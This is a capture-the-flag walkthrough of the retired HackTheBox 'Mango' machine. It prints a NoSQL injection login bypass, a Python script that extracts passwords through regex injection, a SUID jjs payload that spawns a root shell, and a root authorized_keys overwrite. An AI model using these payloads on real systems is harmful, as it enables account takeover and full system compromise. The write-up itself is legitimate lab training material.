HackTheBox - Mango 🥭🥭

❯ PΛYΛƧ0

18-04-2020

GTFObins, MongoDB, NoSQL, jjs, linux, retired

HackTheBox-Sniper

Quick Summary

→ Another awesome machine – "Mango" is a medium difficulty box that was vulnerable into NoSQL injection attack. I was stuck on the main page and the analytics page for an hour until i realize that was only a rabbit hole. There was a login page in staging-order.mango.htb that’s appeal on my NMAP scan. When I go to the forum I found out that the web apps use MongoDB when you try to search on google Mango db it’s a database program, classified as a NoSQL database program.
Using payload from PayloadAllTheThings i managed to bypass the login page’ but when I get in i’ll redirect at a Under Plantation page that was another rabbit hole, but it’s okay because I have now the idea that the machine is vulnerable to NoSQL Injection attack. With my python script i get the credentials for user mango & admin to get in to the machine via SSH and get the user.txt.
In the privilege escalation part there was a vulnerable software installed which is the jjs – a java program command-line tool that is used to invoke the Nashorn engine. You can use it to interpret one or several script files, or to run an interactive shell.
I abuse the vulnerabilty by reading the root.txt and also inject my own SSH key and get in to the machine and got the administrator shell.

Penetration Testing Methodologies

Network Scanning

→ Nmap scan

→ discover open ports and what services are running
Enumeration

→ Browsing the HTTP Service

→ Exploring the Analytics page

→ check the ssl certicate of the webapps
Post - Exploitation

→ Trying to bypass the Login page at staging-order.mango.htb

→ with this payload from PayloadAllTheThings - NoSQL Injection Attack I managed to bypass the login
Exploitation

→ bruteforce the credentials of user – mango & admin using python script

→ After a minutes finally gets the both creds, Login with SSH Key and get the user.txt
Privilege Escalation

→ execute LinEnum.sh to look what we can do the machine

→ look for what permission is allowed to user – admin

→ found the vulnerable software – jjs

→ with the help from GTFObins - jjs I can execute File read command to get root.txt

→ I can also inject SSH keys with File write command

→ Login with my generated SSH keys and become the administrator.

Network Scanning

Walkthrough

→ I always begin at NMAP to look on the services what is running. I always use

-sV ⇒ Probe open ports to determine service/version info
-sC ⇒ equivalent to —script=default
-T 0-5 ⇒ Set timing template - higher is faster (less accurate)
-A- ⇒ Agressive scan
-oN ⇒ to save our scan results to a text file

# bash

nmap -sV -sC -A -T4 10.10.10.162 -oN nmap-Mango

# bash

root in htb/boxes/Mango 
❯ nmap -sV -sC -A 10.10.10.162 -oN nmap-Mango
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 05:31 PST
Nmap scan report for 10.10.10.162
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/19%OT=22%CT=1%CU=30519%PV=Y%DS=2%DC=T%G=Y%TM=5E9B71D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   209.53 ms 10.10.14.1
2   216.74 ms 10.10.10.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.79 seconds

root in htb/boxes/Mango took 48s 
❯

Nmap results

So there’s port open.

22 ⇒ which basically use for SSH Connections
80 ⇒ which basically running a website
443 ⇒ which holding SSL Certificate with "staging-order.mango.htb" I added it to my /etc/hosts file.

Enumeration

Mango Website

Normally i explore first the website’ because that will give us interesting stuffs so :

HackTheBox-Sniper

The main page is looks like a google search right ? At first I didn’t realize that the main page is a hint for this machine i will tell it later.

Next i clicked on the analytics tabs :

HackTheBox-Sniper

This page is totally a rabbit hole’ I can’t do anything about the website so I check the SSL Certifcate and it was registed at staging-order.mango.htb so I added it into my /etc/hosts file.

HackTheBox-Sniper

So after that I visited staging-order.mango.htb and it was a Login page.

HackTheBox-Sniper

Post - Exploitation

I mention about that the main page is looks like a google search’ I realized that was hint to give me idea what should I do for this phase. From the forum it’s a database, the name MANGO is a big hint, so I go to google and search about Mango DB and it give me a results MongoDB which use NoSQL
database program.

so I search about NoSQL Injection Attack and I found this then tried to login with some credentials and used Burp Suite to intercept the request, then modified the request body parameters base on the payload so :

# Burp Suite Repeater

POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1

username[$ne]=payas0&password[$ne]=payas0&login=login

I modified the username & password parameters by adding this [$ne] sending this it will return to HTTP/1.1 200 OK

# Burp Suite Repeater

HTTP/1.1 200 OK
Date: Sat, 18 Apr 2020 22:22:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3380
Connection: close
Content-Type: text/html; charset=UTF-8

Follow redirection and it will go to /home.php

# Burp Suite Repeater

GET /home.php HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1

Under Plantation

when I finally bypass the login it goes me to Under Plantation page :

HackTheBox-Sniper

As you can see at the page there was a user – admin@mango.htb so I will keep it to my mind.
Now that I’m in I try to bruteforce the website under /home.php but bruteforcing is not really helpful until I found that this page is a rabbit hole again. but I have got a user admin and also already know that this was vulnerable to NoSQL Injection attack.

Exploitation

NoSQL Injection

I search about MongoDB - NoSQL Injection attack luckily i found this article it is about extracting admin password from the database using NoSQL Injections.

So then I made a python script that will automate the extraction of password similar to the article, this will need patience because password will reveal one by one so :

# python

import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="mango"
password=""
u="http://staging-order.mango.htb" # Enter the url here
headers={'content-type': 'application/x-www-form-urlencoded', 'staging-order.mango.htb': ''} 

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|','&','\\']:
            payload='username=%s&password[$regex]=^%s.*&login=login'% (username,password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            #print(payload)
            #print(r.status_code)
            if r.status_code == 302:
                print("Found one more char : %s" % (password+c))
                password += c

Get user shell

after almost 10 minutes I complete extracting the user mango password

# bash

mango:		h3mXK8RhU~f{]f5H

Now login this with SSH I have now finally the initial shell.

# bash

root in htb/boxes/Mango via 🐍 v2.7.17 
❯ ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Apr 18 22:39:50 UTC 2020

  System load:  0.01               Processes:            103
  Usage of /:   25.9% of 19.56GB   Users logged in:      0
  Memory usage: 11%                IP address for ens33: 10.10.10.162
  Swap usage:   3%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Apr 18 21:49:56 2020 from 10.10.14.192
mango@mango:~$

I thought i can now get the user.txt until I remember there was another user that I see on the Under Plantation page the admin user. The next I did is to extract also the password using my python script, I just change only the line – username:"mango" to username:"admin" and execute the script.

# python

import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin" #enter the username
password=""
u="http://staging-order.mango.htb" # Enter the url here
headers={'content-type': 'application/x-www-form-urlencoded', 'staging-order.mango.htb': ''}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|','&','\\']:
            payload='username=%s&password[$regex]=^%s.*&login=login'% (username,password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            #print(payload)
            #print(r.status_code)
            if r.status_code == 302:
                print("Found one more char : %s" % (password+c))
                password += c

after 10 minutes the admin password is completed.

# bash

admin:		t9KcS3>!0B#2

now with mango shell I just switch the user and finally get the user.txt :

# bash

mango@mango:~$ su admin
Password: 
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ ls
exploit.sh  leon.sh
$ /bin/bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/mango$ cd ..
admin@mango:/home$ ls
admin  mango
admin@mango:/home$ cd admin
admin@mango:/home/admin$ ls
user.txt
admin@mango:/home/admin$ cat user.txt
79bf3[---------------------]47e92
admin@mango:/home/admin$

Privilege Escalation

JJS Exploitation

For privilege escalation phase I will use LinEnum.sh to look for some stuffs that I will use to get the admin shell.

so from my Kali Linux machine, i transfer LinEnum to the target and execute.

As always it will show the basic information of the vulnerable machine.

# bash

admin@mango:/tmp$ bash LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sat Apr 18 22:52:10 UTC 2020                                                                                                                                                               
                                                                                                                                                                                           

### SYSTEM ##############################################
[-] Kernel information:
Linux mango 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.15.0-64-generic (buildd@lgw01-amd64-038) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.2 LTS"
NAME="Ubuntu"
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic


[-] Hostname:
mango


### USER/GROUP ##########################################
[-] Current user/group info:
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/1    10.10.14.247     Sat Apr 18 21:13:13 +0000 2020
mango            pts/0    10.10.15.230     Sat Apr 18 22:39:51 +0000 2020


[-] Who else is logged on:
 22:52:10 up  1:41,  1 user,  load average: 0.01, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
mango    pts/0    10.10.15.230     22:39    2.00s  2.52s  0.01s sshd: mango [priv]

Going deep of the recon I see interesting stuffs which is the JJS installed.

# bash

[+] Possibly interesting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18  2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

As you can see jjs is owned also by root, after the script is finish running. I also checked the other SUID :

# bash

admin@mango:/home/mango$ find / -perm -4000 -user root 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
admin@mango:/home/mango$

Get the root.txt

I get a hint from the forum, the privilege escalation part is #GTFObins so I go the website and checked about JJS :

HackTheBox-Sniper

According to #GTFObins, we are able to spawn an interactive shell with elevated permissions, I used File read to catch root.txt at /root/ directory and yes ! I’m allowed to read that.

HackTheBox-Sniper

# java

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }
8a8ef[---------------------]9ab15
jjs> exit()
admin@mango:/home/admin$

I also try the SUID when I execute it my session terminal shell is hang up but I get the administrator shell.

HackTheBox-Sniper

# java

admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/pts/1 >/dev/pts/1 2>/dev/pts/1').waitFor()
#

Administrator Shell

I am not satisfy what I did because I want to catch the admin shell and get again the root.txt I have only one options remaining the File write functions.

HackTheBox-Sniper

So my idea is to inject SSH key to /root/.ssh/ directory and login as root with my rsa keys so first i will generate my SSH Keys with commad 'ssh-key -t rsa' then copy the id_rsa.pub and echo it into a file in the /tmp directory so :

# bash

admin@mango:/home/mango$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrIFVL39sxNcAJY5yNM2XxpZtDIeZXI3/HrPW465dJPzS8QqnytUf8pYR2cg9tk3E5CV4XjaYn3MxwDuQ3b5NWjvnqS/8KOCyM1FKQAON/zE055LmxUsv4XysN6bD5HK/wtykAdHCOTvnN2PSQjUMCLe7RDep4Y37KvJdiyN1BnoccHqFo+7BV2PnuBk5rs5o1cG13Knex5hTQhbgXvARqy8nGLeJGjrryl2xsKdyBYeKzBsLLKIEj12LVWBk4zkedDLdcSBMMaioowjB53b+m0/Rel0DT35MLxK1evJL5O2QSQE4qicRKt+verPogttcwq8zWn21orFasRN65kjWM8LKzdgqt8XpGEZ6L/ATZr4rhgu2eduGOuWwMWob6MttdT7X4qAZsfrMdTKuVdJa217dq4U72CJ3a6Re0CQrRxS7eoQHWcYvYIewWbHq/ro+xsyTR7gMDmW82UoE0TZV3/b9WXWgjdQvnVVQ8rxJHVegZAUCFq8LwwBq/Alh6gys= root@Payas0" > /tmp/ssh

And now overwrite the root’s authorized_keys file :

# bash

admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()
0
jjs>
admin@mango:/home/mango$

Now that I setup all’ I’ll login as a root and finally have the last shell and also catch again the root.txt :

# bash

root in htb/boxes/Mango via 🐍 v2.7.17 
❯ ssh -i /root/.ssh/id_rsa root@10.10.10.162
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Apr 18 23:40:32 UTC 2020

  System load:  0.04               Processes:            114
  Usage of /:   25.8% of 19.56GB   Users logged in:      1
  Memory usage: 11%                IP address for ens33: 10.10.10.162
  Swap usage:   4%

 * Kata Containers are now fully integrated in Charmed Kubernetes 1.16!
   Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.

     https://ubuntu.com/kubernetes/docs/release-notes

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Apr 18 23:25:35 2020 from 10.10.14.43
root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mango:~# ls
root.txt
root@mango:~# cat root.txt
8a8ef[---------------------]9ab15
root@mango:~#

If you liked my writeup please leave a respect on my Profile

Referrences:

Extracting MongoDB password with NoSQL Injection

NoSQL Injection

Java gives a shell for everthing

#GTFObins - JJS

Quick Summary

Penetration Testing Methodologies

Network Scanning

Walkthrough

Nmap results

Enumeration

Mango Website

Post - Exploitation

Bypass Login

Under Plantation

Exploitation

NoSQL Injection

Get user shell

Privilege Escalation

JJS Exploitation

Get the root.txt

Administrator Shell